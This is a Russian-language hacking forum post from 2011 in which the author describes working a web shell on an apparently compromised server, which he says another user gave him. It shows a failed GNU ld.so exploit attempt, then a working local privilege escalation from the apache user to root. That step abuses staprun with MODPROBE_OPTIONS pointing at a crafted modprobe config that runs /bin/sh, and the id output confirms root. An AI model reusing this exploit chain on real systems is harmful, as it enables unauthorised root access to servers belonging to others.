Показать сообщение отдельно
Старый 13.08.2011, 15:09   #82
kfor
 
Аватар для kfor
 
Регистрация: 27.01.2011
Сообщений: 120
Репутация: 39
По умолчанию

Ну что же , шелл Спамер кинул мне в приват и как я и говорил его взял RDS. Тут не буду кидать вывод команды,
С GNU вышел пролёт =(

sh-4.0$ ./auto.sh
./auto.sh
lr-x------ 1 apache apache 64 Aug 13 15:00 /proc/1985/fd/3 -> /tmp/s/test/exploit/target
lr-x------ 1 apache apache 64 Aug 13 15:00 /proc/1985/fd/3 -> /tmp/s/test/exploit/target (deleted)
Inconsistency detected by ld.so: dl-open.c: 266: dl_open_worker: Assertion `(call_map)->l_name[0] == '\0'' failed!

А теперь вкусное, первый раз (как правильно заметил SynQ, редко встречается), у меня получилось взъебать через staprun

sh-4.0$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)

sh-4.0$ printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever
<nf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever
id
uid=0(root) gid=0(root) groups=48(apache)
kfor вне форума   Ответить с цитированием